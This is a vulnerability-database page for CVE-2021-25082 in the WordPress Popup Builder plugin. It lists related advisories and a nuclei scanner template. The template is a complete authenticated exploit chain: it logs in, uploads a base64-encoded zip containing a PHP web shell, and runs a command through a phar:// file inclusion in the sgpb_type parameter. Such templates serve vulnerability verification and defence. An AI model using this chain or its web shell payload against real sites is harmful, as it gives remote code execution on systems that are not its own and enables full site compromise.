Lucene search
K

WordPress Popup Builder < 4.0.7 - Remote Code Execution

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 9 Views

WordPress Popup Builder before 4.0.7 allows local file inclusion and remote code execution.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2021-25082
17 Dec 202502:07
circl
CNNVD
WordPress plugin Popup Builder 路径遍历漏洞
21 Feb 202200:00
cnnvd
CNVD
WordPress plugin Popup Builder path traversal vulnerability
23 Feb 202200:00
cnvd
CVE
CVE-2021-25082
21 Feb 202210:45
cve
Cvelist
CVE-2021-25082 Popup Builder < 4.0.7 - LFI to RCE
21 Feb 202210:45
cvelist
EUVD
EUVD-2021-11994
7 Oct 202500:30
euvd
NVD
CVE-2021-25082
21 Feb 202211:15
nvd
OpenVAS
WordPress Popup Builder Plugin < 4.0.7 Multiple Vulnerabilities
1 Mar 202200:00
openvas
OSV
CVE-2021-25082
21 Feb 202211:15
osv
Patchstack
WordPress Popup Builder plugin <= 4.0.6 - Local File Inclusion (LFI) leading to Remote Code Execution (RCE)
24 Jan 202200:00
patchstack
Rows per page
id: CVE-2021-25082

info:
  name: WordPress Popup Builder < 4.0.7 - Remote Code Execution
  author: 0x_Akoko
  severity: critical
  description: |
    Popup Builder WordPress plugin before 4.0.7 contains a local file inclusion caused by unsanitized 'sgpb_type' parameter in require statement, letting attackers include arbitrary local files or execute code via wrappers like PHAR, exploit requires attacker to control 'sgpb_type' parameter.
  impact: |
    Attackers can include arbitrary local files or execute code remotely, leading to remote code execution and full site compromise.
  remediation: |
    Update to version 4.0.7 or later
  reference:
    - https://wpscan.com/vulnerability/0f90f10c-4b0a-46da-ac1f-aa6a03312132/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-25082
  classification:
    cve-id: CVE-2021-25082
    epss-score: 0.05365
    epss-percentile: 0.91676
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cwe-id: CWE-98
  metadata:
    verified: true
    max-request: 5
  tags: cve,cve2021,wordpress,wp-plugin,rce,popup-builder,authenticated,vkev

variables:
  marker: "{{to_lower(rand_text_alpha(10))}}"

flow: http(1) && http(2) && http(3) && http(4) && http(5)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "wordpress_logged_in")
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/upload.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, '_wpnonce')
        condition: and
        internal: true

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - '"_wpnonce":"([a-f0-9]+)"'
        internal: true

  - raw:
      - |
        POST /wp-admin/async-upload.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}}

        ------WebKitFormBoundary{{randstr}}
        Content-Disposition: form-data; name="name"

        malicious.zip
        ------WebKitFormBoundary{{randstr}}
        Content-Disposition: form-data; name="action"

        upload-attachment
        ------WebKitFormBoundary{{randstr}}
        Content-Disposition: form-data; name="_wpnonce"

        {{nonce}}
        ------WebKitFormBoundary{{randstr}}
        Content-Disposition: form-data; name="async-upload"; filename="malicious.zip"
        Content-Type: application/zip

        {{base64_decode("UEsDBAoAAAAAAHINkVuOOgt7HwAAAB8AAAAJABwAUG9wdXAucGhwVVQJAAPHCkJpxwpCaXV4CwABBAAAAAAEAAAAADw/cGhwIHN5c3RlbSgkX0dFVFsiY21kIl0pOyA/PgpQSwECHgMKAAAAAAByDZFbjjoLex8AAAAfAAAACQAYAAAAAAABAAAApIEAAAAAUG9wdXAucGhwVVQFAAPHCkJpdXgLAAEEAAAAAAQAAAAAUEsFBgAAAAABAAEATwAAAGIAAAAAAA==")}}
        ------WebKitFormBoundary{{randstr}}--

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "success", ".zip")
        condition: and
        internal: true

    extractors:
      - type: regex
        name: upload_year
        group: 1
        internal: true
        regex:
          - 'uploads\\/([0-9]+)\\/[0-9]+\\/[^"]+\.zip'

      - type: regex
        name: upload_month
        group: 1
        internal: true
        regex:
          - 'uploads\\/[0-9]+\\/([0-9]+)\\/[^"]+\.zip'

  - raw:
      - |
        GET /wp-content/uploads/{{upload_year}}/{{upload_month}}/malicious.zip HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(header, "application/zip")
        condition: and
        internal: true

  - raw:
      - |
        GET /?sgpb_type=phar://wp-content/uploads/{{upload_year}}/{{upload_month}}/malicious.zip/&cmd=echo%20{{marker}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "{{marker}}")
        condition: and
# digest: 4b0a004830460221009f9be32c6bdf41c89c3e403ac540b89b879e8ad7ac1ca810500c51232363c952022100da2dfa1fa1d5ea9415c94d3fd69905c9a9e07dded9c548b3703d8b1bb737ad60:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 26.5
CVSS 3.18.8
EPSS0.05365
9